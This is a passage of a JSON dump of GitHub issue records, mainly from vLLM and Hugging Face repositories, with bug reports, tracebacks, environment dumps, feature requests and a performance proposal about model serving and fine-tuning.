blocks](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any traceback provided is complete", "url": "https://github.com/huggingface/trl/issues/4569", "state": "closed", "labels": [ "\ud83d\udc1b bug", "\ud83d\udcda documentation", "\ud83c\udfcb GRPO" ], "created_at": "2025-11-25T01:30:28Z", "updated_at": "2025-11-25T21:28:00Z", "comments": 2, "user": "DNXie" }, { "repo": "vllm-project/vllm", "number": 29306, "title": "[Usage]: dots.llm.inst is not running due to a type error", "body": "### Your current environment\n\nI'm trying to run dots llm on 4xH100\n\n```\nvllm serve \\\n --uvicorn-log-level=info \\\n rednote-hilab/dots.llm1.inst \\\n --dtype auto \\\n --api-key xxx \\\n --host 0.0.0.0 \\\n --port 8000 \\\n --tensor-parallel-size 4\n --ipc=host \\\n --trust-remote-code\n```\n\nIt failed to run, I got the following crash:\n\n```text\n(EngineCore_DP0 pid=10684) ERROR 11-24 09:41:25 [v1/executor/multiproc_executor.py:230] Worker proc VllmWorker-1 died unexpectedly, shutting down executor.\n(EngineCore_DP0 pid=10684) Process EngineCore_DP0:\n(EngineCore_DP0 pid=10684) Traceback (most recent call last):\n(EngineCore_DP0 pid=10684) File \"/usr/lib/python3.12/multiprocessing/process.py\", line 314, in _bootstrap\n(EngineCore_DP0 pid=10684) self.run()\n(EngineCore_DP0 pid=10684) File \"/usr/lib/python3.12/multiprocessing/process.py\", line 108, in run\n(EngineCore_DP0 pid=10684) self._target(*self._args, **self._kwargs)\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 846, in run_engine_core\n(EngineCore_DP0 pid=10684) raise e\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 833, in run_engine_core\n(EngineCore_DP0 pid=10684) engine_core = 
EngineCoreProc(*args, **kwargs)\n(EngineCore_DP0 pid=10684) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 606, in __init__\n(EngineCore_DP0 pid=10684) super().__init__(\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 109, in __init__\n(EngineCore_DP0 pid=10684) num_gpu_blocks, num_cpu_blocks, kv_cache_config = self._initialize_kv_caches(\n(EngineCore_DP0 pid=10684) ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 231, in _initialize_kv_caches\n(EngineCore_DP0 pid=10684) available_gpu_memory = self.model_executor.determine_available_memory()\n(EngineCore_DP0 pid=10684) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/executor/abstract.py\", line 126, in determine_available_memory\n(EngineCore_DP0 pid=10684) return self.collective_rpc(\"determine_available_memory\")\n(EngineCore_DP0 pid=10684) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/executor/multiproc_executor.py\", line 358, in collective_rpc\n(EngineCore_DP0 pid=10684) return aggregate(get_response())\n(EngineCore_DP0 pid=10684) ^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=10684) File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/executor/multiproc_executor.py\", line 341, in get_response\n(EngineCore_DP0 pid=10684) raise RuntimeError(\n(EngineCore_DP0 pid=10684) RuntimeError: Worker failed with error 'TypeError: can't multiply sequence by non-int of type 'float'\n\n\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] EngineCore failed to start.\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] Traceback (most recent call last):\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 833, in run_engine_core\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] engine_core = EngineCoreProc(*args, **kwargs)\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 606, in __init__\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] super().__init__(\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 109, in __init__\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] num_gpu_blocks, num_cpu_blocks, kv_cache_config = self._initialize_kv_caches(\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] File \"/home/ubuntu/venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 231, in _initialize_kv_caches\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] available_gpu_memory = self.model_executor.determine_available_memory()\n(EngineCore_DP0 pid=11385) ERROR 11-24 09:45:27 [v1/engine/core.py:842] ", "url": 
"https://github.com/vllm-project/vllm/issues/29306", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-24T09:48:08Z", "updated_at": "2025-11-28T23:25:27Z", "comments": 1, "user": "rain-1" }, { "repo": "huggingface/transformers", "number": 42353, "title": "SAM3 point mode is not supported yet?", "body": "In [SAM3 official example](https://github.com/facebookresearch/sam3/blob/main/examples/sam3_for_sam1_task_example.ipynb\n), they also support point mode. But it seems that transforms has not supported yet?\n", "url": "https://github.com/huggingface/transformers/issues/42353", "state": "closed", "labels": [], "created_at": "2025-11-24T07:16:52Z", "updated_at": "2025-11-26T15:16:25Z", "comments": 1, "user": "haofanwang" }, { "repo": "vllm-project/vllm", "number": 29297, "title": "[Bug]: What should the image embedding input be like? I have tested with multiple cases but it all fails", "body": "### Your current environment\n\n```text\n==============================\n System Info\n==============================\nOS : Red Hat Enterprise Linux release 8.10 (Ootpa) (x86_64)\nGCC version : (GCC) 8.5.0 20210514 (Red Hat 8.5.0-26)\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.28\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.10.19 (main, Oct 21 2025, 16:43:05) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-4.18.0-553.50.1.el8_10.x86_64-x86_64-with-glibc2.28\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA A100-SXM4-40GB\nGPU 1: NVIDIA A100-SXM4-40GB\n\nNvidia driver version : 575.51.03\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nByte Order: Little Endian\nCPU(s): 128\nOn-line CPU(s) list: 0-127\nThread(s) per core: 1\nCore(s) per socket: 64\nSocket(s): 2\nNUMA node(s): 8\nVendor ID: AuthenticAMD\nCPU family: 23\nModel: 49\nModel name: AMD EPYC 7742 64-Core Processor\nStepping: 0\nCPU MHz: 2250.000\nCPU max MHz: 2250.0000\nCPU min MHz: 1500.0000\nBogoMIPS: 4491.72\nVirtualization: AMD-V\nL1d cache: 32K\nL1i cache: 32K\nL2 cache: 512K\nL3 cache: 16384K\nNUMA node0 CPU(s): 0-15\nNUMA node1 CPU(s): 16-31\nNUMA node2 CPU(s): 32-47\nNUMA node3 CPU(s): 48-63\nNUMA node4 CPU(s): 64-79\nNUMA node5 CPU(s): 80-95\nNUMA node6 CPU(s): 96-111\nNUMA node7 CPU(s): 112-127\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves 
cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local clzero irperf xsaveerptr wbnoinvd arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold avic v_vmsave_vmload vgif v_spec_ctrl umip rdpid overflow_recov succor smca sme sev sev_es\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-python==0.5.2\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.16.0\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.13.1.3\n[pip3] nvidia-curand-cu12==10.3.9.90\n[pip3] nvidia-cusolver-cu12==11.7.3.90\n[pip3] nvidia-cusparse-cu12==12.5.8.93\n[pip3] nvidia-cusparselt-cu12==0.7.1\n[pip3] nvidia-cutlass-dsl==4.3.0\n[pip3] nvidia-ml-py==13.580.82\n[pip3] nvidia-nccl-cu12==2.27.5\n[pip3] nvidia-nvjitlink-cu12==12.8.93\n[pip3] nvidia-nvshmem-cu12==3.3.20\n[pip3] nvidia-nvtx-cu12==12.8.90\n[pip3] pyzmq==27.1.0\n[pip3] torch==2.9.0\n[pip3] torchaudio==2.9.0\n[pip3] torchvision==0.24.0\n[pip3] transformers==4.57.1\n[pip3] triton==3.5.0\n[conda] flashinfer-python 0.5.2 pypi_0 pypi\n[conda] numpy 2.2.6 pypi_0 pypi\n[conda] nvidia-cublas-cu12 12.8.4.1 pypi_0 pypi\n[conda] nvidia-cuda-cupti-cu12 12.8.90 pypi_0 pypi\n[conda] nvidia-cuda-nvrtc-cu12 12.8.93 pypi_0 pypi\n[conda] nvidia-cuda-runtime-cu12 12.8.90 pypi_0 pypi\n[conda] nvidia-cudnn-cu12 9.10.2.21 pypi_0 pypi\n[conda] nvidia-cudn", "url": "https://github.com/vllm-project/vllm/issues/29297", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-24T06:02:09Z", "updated_at": "2025-11-26T13:00:17Z", "comments": 2, "user": "DamonZhao-sfu" }, { "repo": "vllm-project/vllm", "number": 29294, "title": "[CPU Backend] [Doc]: Update Installation Docs for Arm CPUs", "body": "### \ud83d\udcda The doc issue\n\nThis page https://docs.vllm.ai/en/stable/getting_started/installation/cpu/#arm-aarch64 is very out-dated.\nWe now release Arm CPU wheels and images thanks to #26931 and #27331\n\nWe need to update that page to reflect that :)\n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29294", "state": "closed", "labels": [ "documentation", "cpu" ], "created_at": "2025-11-24T05:33:46Z", "updated_at": "2025-12-15T19:46:26Z", "comments": 5, "user": "fadara01" }, { "repo": "vllm-project/vllm", "number": 29286, "title": "[Performance]: cache system prompt token ids", "body": "### Proposal to improve performance\n\nAs system prompt can be very long now, tokenize the system prompt can be slow. \n\nUsing H20, tokenize 5000 tokens cost about 10ms as below:\n\n![Image](https://github.com/user-attachments/assets/e1b0dafa-6514-47e6-8531-db8eaea32cc7)\n\nSystem prompts are usually fixed and reusable, so cache the system prompt can be profitable.\n\nSpecificly:\n1. 
In **apply_hf_chat_template** method we can separate the system prompt from other prompts, we can use condition **cache_system_prompt = truncate_prompt_tokens is None and not tokenize and len(conversation) > 1 and conversation[0].get(\"role\") == \"system\"** to judge when we should separate the system prompt.\n2. In **_normalize_prompt_text_to_input** method we judge that whether system prompt is in the dict ({system prompt: token ids}) that we can reuse, then concat system prompt token ids and prompt token ids as the final input_ids.\n\nI am willing to contribute to this opt and looking forward to your suggestions!\n\n### Report of performance regression\n\nThe above cost can be profitable.\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29286", "state": "open", "labels": [ "performance" ], "created_at": "2025-11-24T01:55:32Z", "updated_at": "2025-11-28T08:57:06Z", "comments": 2, "user": "Eviannn" }, { "repo": "vllm-project/vllm", "number": 29281, "title": "[Usage]: Removing last generated token from output and kv cache", "body": "### Your current environment\n\n```text\nvLLM 0.11.2\n```\n\n\n### How would you like to use vllm\n\nHey guys,\n\ni am currently working on a research project where i load a moe-like model and i want to do routing based on the sequence state.\nThe goal is to let expert 0 generate until it reaches the eos token, then remove the eos token and finish generation with expert 1 until the eos token is hit a second time.\nI want to do this to use different strengths of both models.\nMy current approach is to modify GPUModelRunner and Scheduler to remove the eos token from output, reduce num_computed_tokens by 1 and compute a static routing tensor based on the sequence state which i pass as additional model input, to route to expert 0 or 1.\n\nNow i am having some issues with unexpected output, especially with tensor_parallelism>1 on multiple gpus.\n\nI was wondering if there already is a reliable solution to remove the last generated token from output and kv cache, so that the computation leading to eos does not interfere with the second expert.\n\nOr maybe there is even a better way to do this?\n\nThank you!\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29281", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-23T22:39:16Z", "updated_at": "2025-11-26T09:33:53Z", "comments": 0, "user": "josefdra" }, { "repo": "vllm-project/vllm", "number": 29277, "title": "[Usage]: Creating and accessing per request arguments inside vLLM model", "body": "### Your current environment\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### How would you like to use vllm\n\nI want to implement token compression techniques on the output embeddings of Qwen-2.5VL which would occur dynamically as the number of requests change. 
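\n\nFor illustration, a minimal sketch of the per-request plumbing that exists today, assuming the `extra_args` field of `SamplingParams` (the `compression_ratio` key is made up; custom logits processors can read `extra_args`, but it is not obviously reachable from inside the model's forward pass):\n\n```python\nfrom vllm import LLM, SamplingParams\n\nllm = LLM(model=\"Qwen/Qwen2.5-VL-7B-Instruct\")\n# Hypothetical per-request knob: extra_args travels with the request and is\n# surfaced to custom logits processors through their update_state() hook.\nparams = SamplingParams(max_tokens=64, extra_args={\"compression_ratio\": 0.5})\noutputs = llm.generate([\"Describe the image.\"], params)\n```\n\n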
Is there anyway to implement this in vLLM? I see that SamplingParams seem to be the only way to use per request custom arguments but I don\u2019t believe it can be accessed within the model code directly?\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29277", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-23T21:59:31Z", "updated_at": "2025-11-23T21:59:31Z", "comments": 0, "user": "minlu21" }, { "repo": "huggingface/transformers", "number": 42344, "title": "How to fine-tune SAM 3D models?", "body": "### Model description\n\nThe recently released SAM 3D work is truly remarkable. Do you plan to integrate it into Transformers and enable fine-tuning?\nhttps://huggingface.co/facebook/sam-3d-objects\n\n### Open source status\n\n- [x] The model implementation is available\n- [x] The model weights are available\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/transformers/issues/42344", "state": "open", "labels": [ "New model" ], "created_at": "2025-11-23T17:40:57Z", "updated_at": "2025-11-23T17:40:57Z", "user": "bruno686" }, { "repo": "vllm-project/vllm", "number": 29264, "title": "[Usage]: Monkey Patching SamplingParams", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.13.5 | packaged by conda-forge | (main, Jun 16 2025, 08:27:50) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-6.8.0-87-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.8.93\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA B200\nGPU 1: NVIDIA B200\nGPU 2: NVIDIA B200\nGPU 3: NVIDIA B200\nGPU 4: NVIDIA B200\nGPU 5: NVIDIA B200\nGPU 6: NVIDIA B200\nGPU 7: NVIDIA B200\n\nNvidia driver version : 570.195.03\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 224\nOn-line CPU(s) list: 0-223\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) PLATINUM 8570\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 56\nSocket(s): 2\nStepping: 2\nCPU(s) scaling MHz: 31%\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl 
xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect user_shstk avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req vnmi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr ibt amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities ibpb_exit_to_user\nVirtualization: VT-x\nL1d cache: 5.3 MiB (112 instances)\nL1i cache: 3.5 MiB (112 instances)\nL2 cache: 224 MiB (112 instances)\nL3 cache: 600 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-55,112-167\nNUMA node1 CPU(s): 56-111,168-223\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI", "url": "https://github.com/vllm-project/vllm/issues/29264", "state": "closed", "labels": [ "usage" ], "created_at": "2025-11-23T11:45:54Z", "updated_at": "2025-11-24T13:03:50Z", "comments": 2, "user": "josefdra" }, { "repo": "vllm-project/vllm", "number": 29263, "title": "[Feature]: Enable flash attention (and/or FlashMLA) for AMD GPUs", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nIn [this page from flash-attention](https://github.com/Dao-AILab/flash-attention?tab=readme-ov-file#amd-rocm-support), I checked that the upstream `flash-attention` currently has composable_kernel (for newer AMD GPUs) and WIP triton (for older RDNA GPUs, etc.) implementations. 
As well as [flash MLA](https://github.com/deepseek-ai/FlashMLA?tab=readme-ov-file#amd-instinct).\n\nIs it possible to enable `vllm.vllm_flash_attn._vllm_fa2_C` and more modules for AMD GPUs?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/29263", "state": "closed", "labels": [ "feature request", "rocm" ], "created_at": "2025-11-23T11:28:47Z", "updated_at": "2025-12-05T01:54:08Z", "comments": 4, "user": "Inokinoki" }, { "repo": "vllm-project/vllm", "number": 29245, "title": "[Usage]: Starting qwen3 vl is extremely slow, while sglang starts quickly. What could be the cause?", "body": "### Your current environment\n\nEven running python collect_env.py is very slow; the environment was installed directly with uv.\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.2 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 4.1.2\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.3 (main, Jun 18 2025, 17:59:45) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-5.10.134-19.100.al8.x86_64-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.9.86\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : \nGPU 0: NVIDIA L20Y\nGPU 1: NVIDIA L20Y\nGPU 2: NVIDIA L20Y\nGPU 3: NVIDIA L20Y\nGPU 4: NVIDIA L20Y\nGPU 5: NVIDIA L20Y\nGPU 6: NVIDIA L20Y\nGPU 7: NVIDIA L20Y\n\nNvidia driver version : 570.148.08\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.10.2\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.10.2\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Platinum 8468V\nCPU family: 6\nModel: 143\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 8\nCPU(s) scaling MHz: 70%\nCPU max MHz: 3800.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4800.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx 
pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single intel_ppin cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req hfi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm uintr md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 195 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; ", "url": "https://github.com/vllm-project/vllm/issues/29245", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-22T20:41:27Z", "updated_at": "2025-12-11T11:23:54Z", "comments": 3, "user": "hucorz" }, { "repo": "huggingface/candle", "number": 3208, "title": "`cudarc` dynamic loading support", "body": "Currently, `candle` uses `cudarc` with the `dynamic-linking` feature, which requires the executable to find the DLLs or SOs at startup. 
However, it would be more convenient if `candle` also supported the `dynamic-loading` feature from `cudarc` to load DLLs or SOs at runtime.\nIs it possible for `candle` to support it?", "url": "https://github.com/huggingface/candle/issues/3208", "state": "open", "labels": [], "created_at": "2025-11-22T18:18:25Z", "updated_at": "2025-11-25T09:00:27Z", "comments": 7, "user": "mayocream" }, { "repo": "huggingface/transformers", "number": 42331, "title": "SAM3 does not support custom inference resolutions", "body": "### System Info\n\nNote: I am running the latest git version, sys Info should not be relevant to the issue\n$ transformers env \nTraceback (most recent call last):\n File \"/home/master-andreas/panopticon/test_env/bin/transformers\", line 3, in \n from transformers.cli.transformers import main\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/transformers/cli/transformers.py\", line 23, in \n from transformers.cli.serve import Serve\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/transformers/cli/serve.py\", line 351, in \n class Serve:\n File \"/home/master-andreas/panopticon/test_env/lib/python3.12/site-packages/transformers/cli/serve.py\", line 658, in Serve\n ) -> ChatCompletionChunk:\n ^^^^^^^^^^^^^^^^^^^\nNameError: name 'ChatCompletionChunk' is not defined\n\n### Who can help?\n\n@yonigozlan\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [x] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n```py\n\"\"\"\nTest script for SAM3 text prompting only.\nThis script demonstrates how to use SAM3 for text-based segmentation on images.\n\"\"\"\n\nimport 